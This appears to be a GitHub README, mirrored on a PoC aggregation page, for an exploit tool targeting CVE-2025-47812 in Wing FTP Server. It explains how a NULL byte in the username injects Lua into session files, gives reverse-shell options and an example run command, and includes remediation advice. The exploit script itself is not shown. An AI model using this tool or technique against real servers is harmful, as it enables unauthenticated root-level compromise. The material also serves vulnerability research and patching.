来源

关联漏洞

描述

Exploit for CVE-2025-47812 with custom psudo shell and robust error handling.

介绍

<div align="center">

**CVE-2025-47812 Improper input validation led to Remote Code Execution to full system compromise**

</div>

<div align="center">
  
![GitHub last commit](https://img.shields.io/github/last-commit/pevinkumar10/CVE-2025-47812) [![GitHub license](https://img.shields.io/github/license/pevinkumar10/CVE-2025-47812)](https://github.com/pevinkumar10/CVE-2025-47812/blob/main/LICENSE)

</div>

## 📘 Introduction:

Julien Ahrens from RCE Security discovered a critical security vulnerability impacting WingFTP. Tracked as CVE-2025-47812, the vulnerability has a CVSS score of 10. Successful exploitation of the vulnerability may allow a remote unauthenticated attacker to execute arbitrary code, leading to complete system compromise.

Wing FTP Server is cross-platform, user-friendly, and secure FTP server software. It supports multiple file transfer protocols, such as FTP, FTPS, HTTP, HTTPS, and SFTP, allowing flexibility for client connections.

To research CVE-2025-47812, I deployed a Docker container running Wing FTP Server 7.4.3 on a Linux host. The container was configured to expose the web interface, and I enabled anonymous login for easier unauthenticated testing. Additionally, a test user account (`dev-test:test`) was created to simulate authenticated scenarios. This setup provided a safe and controlled environment to reproduce the vulnerability and validate exploit behavior.

## 🚨 Vulnerability Summary:

- CVE ID: CVE-2025-47812

- CVSS v3.1 Vector:

- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

- Base Score: 10.0 (Critical)

- Affected Software: <= 7.4.3

- Impact: Remote Code Execution led to Full system compromise.

- Exploitation Prerequisites:

  - Anonymous Login allowed or valid user credential

  - No sudo permissions required for the user 


## 🧪 Exploit Description:

When a user try to login it calls the c_CheckUser call which always returns OK_CHECK_CONNECTION regardless of what comes after the NULL byte in the username, as long as the string before the NULL byte matches an existing user. An attacker may exploit the vulnerability by adding a NULL byte and extra values to a known username to bypass the password check. The system uses strlen() on our username to get the string size, but strlen only counts all the characters until it reaches the NULL-byte terminator to match the unsanitized username.

The unsanitized username (including the injected NULL and brainy payload) is stored directly into session files as Lua code. These session files resemble .lua and are later executed when sessions are loaded. On Linux, Wing FTP server runs as root; on Windows, it runs as SYSTEM. The injected Lua payload runs with full privileges upon session reload.

Note : This behaviour is only happening if the password is not set or with a valid credentials. It enforcing some strict password validation if password is set for the user. 

## ⚒️ Install:

### Options:
```
    Options:
        -t, --target     Target Wing FTP Server URL (e.g., http://192.168.1.100)
        -u, --username   Username to authenticate (default: anonymous)
        -p, --password   Password to authenticate (default: empty)
        -lh, --lhost     Local host to listen for reverse shell (default: 127.0.0.1)
        -lp, --lport     Local port to listen for reverse shell (default: 31337)
        -ns, --no-shell  To specify the exploit to not span a temp shell. (Note if it set should manually set listener)
        -v, --verbose    Enable verbose/debug output
        -h, --help       Show this help message and exit
```

### Usage:
```bash
git clone https://github.com/pevinkumar10/CVE-2025-47812

cd CVE-2025-47812

pip3 install -r requirements.txt
```
### 🎯 Exploitation:

<p align="center">
  <img src="src/unauth-rce.gif" alt="CVE-2025-47812" width="550">
  <br>
  <em>CVE-2025-47812 - Wing FTP Server Unauthenticated RCE</em>
</p>

<br>

<p align="center">
  <img src="src/auth-rce.gif" alt="CVE-2025-47812" width="600">
  <br>
  <em>CVE-2025-47812 - Wing FTP Server authenticated RCE (dev-test:test)</em>
</p>


<h1 align="center">
  <video src="src/auth-rce.mp4" alt="CVE-2025-32463" width="650px">
  <br>
</h1>

Example usage:
```bash
python3 exploit.py --target http://172.17.0.2 --lhost 172.17.0.1 -lport 31336 
```

## 🛡️ Remediation:

- Users must upgrade to WingFTP version 7.4.4 to patch the vulnerability.

- Please refer to the WingFTP Release [Notes](https://www.wftpserver.com/serverhistory.htm) for more information.


## 📜 Reference & Credit:

- Original Exploit Author: Sheikh Mohammad Hasan aka [4m3rr0r](https://github.com/4m3rr0r)

- [Qualys](https://threatprotect.qualys.com/2025/07/02/wingftp-critical-remote-code-execution-vulnerability-cve-2025-47812/)

- [Exploit](https://www.exploit-db.com/exploits/52347)

Note : I used the above reference for research purpose and updated the exploit with more fetures and robust error handling. 

## ⚖️ License:

This Python PoC is released under the [MIT](./LICENSE) License.
The original exploit concept and disclosure credit belong to the Stratascale Cyber Research Unit.

文件快照

 [4.0K]  /data/pocs/e784151369860c7bb745bffeeb01a0d52cdc50ea
├── [9.3K]  exploit.py
├── [1.0K]  LICENSE
├── [5.1K]  README.md
├── [   9]  requirements.txt
└── [4.0K]  src
    ├── [3.7M]  auth-rce.gif
    ├── [  62]  auth-rce.gif:Zone.Identifier
    ├── [4.9M]  unauth-rce.gif
    └── [  62]  unauth-rce.gif:Zone.Identifier

1 directory, 8 files

备注